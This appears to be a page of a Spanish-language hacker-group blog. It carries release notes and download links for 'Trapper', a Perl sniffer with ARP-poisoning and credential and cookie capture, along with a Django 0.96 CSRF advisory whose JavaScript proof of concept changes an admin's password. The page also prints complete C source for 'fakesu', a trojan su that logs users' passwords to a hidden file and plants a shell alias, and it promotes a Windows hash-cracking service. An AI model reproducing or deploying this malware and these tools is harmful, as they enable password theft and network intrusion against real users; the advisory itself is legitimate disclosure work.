Menu #1: Top

Trapper 0.4 on his way ;)

Posted by crypkey on Projects
Bueno pues para q no digan que ya no se esta desarrollando, pues si estamos trabajando ya sobre la 0.4 de trapper que incluira:

Https Sniffing
MSN Sniffing basado en sessiones 100% stable ( sin uso de base de datos etc.. )
SIP Sniffing
Cisco Sniffing
Cookie injector ( Bastante interesante )

Y esperamos tambien meter:

VNC Sniffing
RTP Sniffing Wink

Aqui solo les dejo una screenshot del nuevo msn sniffing y pues lo demas, solo esperen =)

http://img502.imageshack.us/img502/5812/newmsnsniffingwc6.png

Trapper 0.3.4

Posted by crypkey on Random

New features:

Fake Mac supported almost in every distro
FTP and POP3 passwd in different files
Host and path for HTTP sniffing
Installer added
Code cleanup
Stats added

Bugs fixed:

POP3 bad handling of multiple logins
Saving incorrectly irc private msgs
Killing incorrectly APR attack
Post in HTTP sniffing not detected correctly

Download: http://nediam.com.mx/trapper/download.html

Trapper 0.3.3

Posted by crypkey on Random
Small bug fixes:

Sniffing after APR
Bad cookie saving.

Download: http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz

Trapper 0.3.2

Posted by crypkey on Random
Cosas nuevas: - Verbose para IRC Sniffing - Dirección MAC falsa (00:11:22:33:44:55 o aleatoria) - Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain) - Especificar ports en trapper.conf - IRC chat sniffing Bugs arreglados: - Detección de la dirección IP local - HTTP sniffing double value - Install.pl, modulos faltantes - Mostrando cookies en blanco Download Click HERE! Any bugs report it to: RTM Forums or at crypkey@0hday.org, nediam@0hday.org, nahual@0hday.org

Trapper 0.3.1 released

Posted by crypkey on Random
We are currently working on https sniffing and smb downgrade sniffing, probably next release will include them Wink w00t. Improvements: Http Sniffing APR Features: Cookie sniffing -v msn and cookie option Bug Fixes: Bad parsing on http sniffing Download: http://nediam.com.mx/trapper/trapper-0.3.1.tar.gz

Trapper 0.3 released

Posted by crypkey on Random
Bug Fixes: - Install.pl - Http Sniffing - APR timing. - Some other crappy fixes Improvements: - MSN Sniffing - IRC Sniffing - Http Sniffing - APR attack Any comments or bug reports go to: www.zonartm.org/foro Download: http://nediam.com.mx/trapper/trapper-0.3.tar.gz

Django 0.96 vulnerability

Posted by xiam on Random
Les paso el reporte de un fallo en django: Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default django's admin panel. Background ========== Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that allows a person with admin privileges to modify the database tables, it allows to change any user password too. See more at http://www.djangoproject.com Summary ======= django has, by default, no CSRF protection, this may allow an attacker to change any user password by tricking a victim with admin privileges into a special forged web page (even in a a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed, otherwise nothing will happen. Severity ======== Mild. This problem exists only with the default installation and can be easily solved using a middleware found in here: http://www.djangoproject.com/documentation/csrf/. Proof of concept ================ window.onload = function() { var url = "http://127.0.0.1:8000/admin/auth/user/1/password/"; var pass = "funky"; var param = { password1: pass, password2: pass }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement(''); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } Solution ======== Use the django's CSRF protection in all your applications. Take a look at http://www.djangoproject.com/documentation/csrf/. Disclosure Timeline =================== 2007.10.18 - Vulnerability found 2007.10.18 - Vulnerability reported to vendor 2007.10.18 - Vendor response, among other things: ..."it's not a vulnerability unless you can somehow force the code into my browser"... 2007.10.21 - Advisory release License ======= Copyright 2007 J. Carlos Nieto The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

Se libera la versión 0.1 de Trapper

Posted by crypkey on Random
Trapper es un sniffer que aparte tiene la modalidad de lanzar ataques de ARP Poison. Está escrito en Perl. El desarrollo de Trapper fue inspirado en la funcionalidad de Cain, pero como éste sólo funciona en Windows, quisimos hacer un programa que funcionara en Linux/Unix. Lo pueden descargar de aquí. Para cualquier bug report, comentarios, dudas etc.. pueden usar el foro de RTM

fakesu.c

Posted by nahual on Random
Hace poco tuve la necesidad de poner un fakesu, y la verdad los que encontre y los scripts eran demaciado intrusivos y no tenian mucha opcion, esta es una version muuy rapida de fakesu donde hacemos locking (la mayoria solo toma el primer password) con archivos y guardamos todo en /var/tmp/, recuerden de hacer alias su=/var/tmp/.su o algo asi. Sin mas preambulo lo ponemos aqui, ya que la pagina se ve bastante muerta. /* * fake-su.c * * fastly written by nahual * god all the fakesu sucked * * Bastante sencillo: * * gcc -O2 -o .su fake-su.c * mv .su /var/tmp/.su * echo "alias su=/var/tmp/.su" >> ~/.bash_profile * Y esperar ... * * El Nahual * * TODO: * Agregar la posibilidad de que nos mande el password en un paquete UDP para logeo remoto. * */ #include #include #include #define SU "/bin/su" #define PASSWD "/var/tmp/.passwd" #define LOCK "/var/tmp/.su.lock" extern char **environ; int main(int argc, char **argv) { char *pass; char *user; char *ruser; FILE *inFile; switch(argc) { case 1: user = "root"; break; case 2: if(!strncmp("-", argv[1], 1)) { user = "root"; } else { user = argv[1]; } break; case 3: user = argv[2]; break; } //Esta el lockfile ya le grabamos una vez, lo dejamos en paz if((inFile = fopen(LOCK, "r")) != NULL) { unlink(LOCK); argv[0] = SU; execve(argv[0], argv, environ); } //Okas ahora lo ponemos en el file pero como tenemos "delay" vamos a grabarlo y luego hacer execle al su real if((inFile = fopen(PASSWD, "a+")) == NULL) { execle(SU, SU, argv[1], argv[2], NULL, environ); //Si definido DEBUG hablamos .. si no .. calladitos nos vemos mas bonitos #ifdef DEBUG perror("open() on PASSWD file"); #endif } //Okas agarramos el password ya pass = getpass("Password: "); ruser = getenv("USER"); fprintf(inFile, "%s tried %s / %s\n", ruser, user, pass); fclose(inFile); inFile = fopen(LOCK, "w"); fclose(inFile); printf("su: Permission denied\nSorry\n"); return 0; }

Windows Hashes Repository

Posted by crypkey on Random
En conjunto con el staff de nediam.com.mx, se libera la versión 1.0 del sistema "Windows Hashes Repository". El objetivo de este proyecto es crear un repositorio con los hashes de Windows (LM y NT) de los password más comúnmente utilizados. Ustedes pueden alimentar al sistema con sus propios passwords; pueden introducirlos ya sea en texto plano o en hashes LM (LANMAN) o NT. Para el caso de texto plano, el sistema automáticamente calculará y desplegará los hashes. Si es por hashes, el sistema buscará en el repositorio y si encuentra dicho hash, desplegará la información asociada, y si no entonces se enviará a una fila de espera donde se intentará crackearlo utilizando rainbow tables. La página del sistema es: http://nediam.com.mx/winhashes/. // Crypkey
Pages: [1] 2